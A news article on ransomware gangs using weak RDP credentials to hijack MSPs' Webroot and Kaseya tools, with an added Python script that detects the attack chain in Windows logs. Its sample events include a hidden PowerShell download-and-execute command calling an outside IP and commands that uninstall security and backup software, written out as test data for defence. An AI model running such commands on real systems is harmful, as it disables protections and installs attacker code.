Hackers target MSPs to launch ‘supply chain’ ransomware attacks

Kaseya and Webroot blame customers’ poor cyber security hygiene for letting attackers into their systems


Businesses are being infiltrated by cyber criminals who are actively exploiting weak account credentials to gain access to systems installed by managed service providers (MSPs) and launch ransomware attacks.

Hackers have targeted customers via the remote monitoring and management tools provided by at least two companies, Webroot and Kaseya, in order to deploy the Sodinokibi malware, according to reports via Reddit.

Further investigation by security company Huntress Labs found that the attackers were gaining initial access to MSPs over the remote desktop protocol (RDP) and then using that foothold to deploy the ransomware.

In two incidents, after gaining admin privileges, the attackers uninstalled Webroot and ESET endpoint security software, as well as Veeam's endpoint-based backup software, before deploying the ransomware.


In another report, the firm found that Webroot's management console was used to execute a PowerShell-based payload that downloaded additional malware. Kaseya's VSA was also used to deliver Sodinokibi in a separate incident.
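The chain described above (RDP password guessing, removal of endpoint security and backup tools once an admin account is obtained, and a hidden PowerShell download cradle pushed through management tooling) is something an MSP's own Windows event logs can surface. The following is an added example, not code from Huntress Labs, Webroot, Kaseya or the article: it runs three simple detections over a constructed set of Windows Security events (4625/4624 logons, 4688 process creations). The sample events, the failure threshold and window, and the exact uninstall command lines (the article does not say how the products were removed) are all assumptions made for illustration.

```python
"""Detect the MSP intrusion chain in Windows Security-style event logs.

Added example, not code from Huntress Labs, Webroot, Kaseya or the article.
All telemetry below is constructed for the example; thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (ISO timestamp, event ID, selected fields).
# Logon type 10 is RemoteInteractive, i.e. RDP. IPs are documentation ranges.
SAMPLE_EVENTS = [
    ("2019-06-20T01:00:05", 4625, {"user": "administrator", "src": "203.0.113.7", "logon_type": "10"}),
    ("2019-06-20T01:00:09", 4625, {"user": "administrator", "src": "203.0.113.7", "logon_type": "10"}),
    ("2019-06-20T01:00:14", 4625, {"user": "msp-admin", "src": "203.0.113.7", "logon_type": "10"}),
    ("2019-06-20T01:00:20", 4625, {"user": "msp-admin", "src": "203.0.113.7", "logon_type": "10"}),
    ("2019-06-20T01:00:27", 4625, {"user": "backup", "src": "203.0.113.7", "logon_type": "10"}),
    ("2019-06-20T01:00:33", 4625, {"user": "backup", "src": "203.0.113.7", "logon_type": "10"}),
    ("2019-06-20T01:04:02", 4624, {"user": "msp-admin", "src": "203.0.113.7", "logon_type": "10"}),
    # One mistyped password from a staff workstation: must not alert.
    ("2019-06-20T08:15:00", 4625, {"user": "jdoe", "src": "10.0.0.25", "logon_type": "10"}),
    ("2019-06-20T08:15:20", 4624, {"user": "jdoe", "src": "10.0.0.25", "logon_type": "10"}),
    # Process creation after the intrusion: security and backup tooling removed
    # (assumed command lines; the article does not state the method used).
    ("2019-06-20T01:10:00", 4688, {"user": "msp-admin", "cmd": 'wmic product where "name like \'%Webroot%\'" call uninstall'}),
    ("2019-06-20T01:10:30", 4688, {"user": "msp-admin", "cmd": 'wmic product where "name like \'%ESET%\'" call uninstall'}),
    ("2019-06-20T01:11:00", 4688, {"user": "msp-admin", "cmd": 'wmic product where "name like \'%Veeam%\'" call uninstall'}),
    # Payload staged through the management agent: hidden PowerShell download cradle.
    ("2019-06-20T01:12:00", 4688, {"user": "SYSTEM", "cmd": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.9/a.ps1')\""}),
    # Benign scheduled-task PowerShell: must not alert.
    ("2019-06-20T02:00:00", 4688, {"user": "SYSTEM", "cmd": "powershell.exe -File C:\\scripts\\rotate-logs.ps1"}),
]

# Products named in the article; extend with whatever the MSP actually deploys.
SECURITY_PRODUCTS = ("webroot", "eset", "veeam")
UNINSTALL_RE = re.compile(r"call\s+uninstall|msiexec(\.exe)?\s.*?/x\b|-uninstall\b", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden",
    re.I,
)


def _ts(s):
    return datetime.fromisoformat(s)


def detect_rdp_password_guessing(events, threshold=5, window=timedelta(minutes=10)):
    """Flag a source IP with >= threshold failed RDP logons inside `window`, and
    record whether a successful RDP logon from that source followed."""
    by_src = defaultdict(lambda: {"fail": [], "ok": [], "users": set()})
    for ts, eid, f in events:
        if eid not in (4624, 4625) or f.get("logon_type") != "10":
            continue
        rec = by_src[f["src"]]
        if eid == 4625:
            rec["fail"].append(_ts(ts))
            rec["users"].add(f["user"])
        else:
            rec["ok"].append(_ts(ts))
    alerts = []
    for src, rec in by_src.items():
        fails = sorted(rec["fail"])
        for i in range(len(fails) - threshold + 1):
            if fails[i + threshold - 1] - fails[i] <= window:
                end = fails[-1] + window
                followed = any(fails[i] <= t <= end for t in rec["ok"])
                alerts.append({"src": src, "failures": len(fails),
                               "accounts": sorted(rec["users"]), "success_followed": followed})
                break  # one alert per source
    return alerts


def detect_security_tool_removal(events):
    """Flag 4688 command lines that uninstall a known security or backup product."""
    alerts = []
    for ts, eid, f in events:
        cmd = f.get("cmd", "")
        if eid == 4688 and UNINSTALL_RE.search(cmd):
            hit = [p for p in SECURITY_PRODUCTS if p in cmd.lower()]
            if hit:
                alerts.append({"time": ts, "user": f["user"], "product": hit[0]})
    return alerts


def detect_powershell_cradle(events):
    """Flag PowerShell launched with download-and-execute or hidden-window switches."""
    return [{"time": ts, "user": f["user"], "cmd": f["cmd"]}
            for ts, eid, f in events
            if eid == 4688 and "powershell" in f.get("cmd", "").lower()
            and CRADLE_RE.search(f["cmd"])]


def triage(events):
    """Run all three detections; a host showing all three in sequence matches the chain."""
    return {
        "rdp_password_guessing": detect_rdp_password_guessing(events),
        "security_tool_removal": detect_security_tool_removal(events),
        "powershell_cradle": detect_powershell_cradle(events),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2, default=str))
```

On the constructed sample, the first detection fires once for 203.0.113.7 (six failures across three accounts, then a successful RDP logon), the second fires three times (Webroot, ESET, Veeam), and the third fires only for the hidden download cradle, not for the scheduled-task script. In production the uninstall regex will also match legitimate software removals, so the product keyword list is what keeps it actionable; likewise the RDP rule is only meaningful if RDP is reachable from outside at all, which the article's own finding argues it should not be.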

The scale of the incident is not fully known, but Huntress Labs suggests it could affect thousands of clients. The affected MSP, which has not been named publicly, is being offered technical assistance by Huntress Labs' CEO.

UBX Cloud, the company which originally created a thread about these reports, described the situation as "insanity" and, citing a conference call, suggested several Kaseya customers were affected.

Both Webroot and Kaseya have confirmed a portion of their customers have been infiltrated by threat actors, and have pointed the finger at inconsistent and lax password management. The integrity of their own products has apparently not been affected.

"We all know that two-factor authentication (2FA) is a cyber hygiene best practice, and we've encouraged customers to use the Webroot Management Console's built-in 2FA for some time," Webroot's senior vice president of products Chad Bacher said on Reddit.

"Recently, Webroot's Advanced Malware Removal team discovered that a small number of customers were impacted by a threat actor exploiting a combination of customers' weak cyber hygiene practices around authentication and RDP."


As a result, Webroot has forced a logout of all management console sessions and is releasing a software update that enables 2FA by default for all customers.

"We are aware of limited instances where customers were targeted by threat actors who leveraged compromised credentials to gain unauthorized access to privileged resources," Kaseya CTO John Durant told Dark Reading.

"All available evidence at our disposal points to the use of compromised credentials."

The rise of such supply chain attacks was previously flagged in a National Cyber Security Centre (NCSC) report released last year. A large number of MSPs were subject to attacks in 2017, and the report warned that, when done well, these compromises are extremely difficult and sometimes impossible to detect.
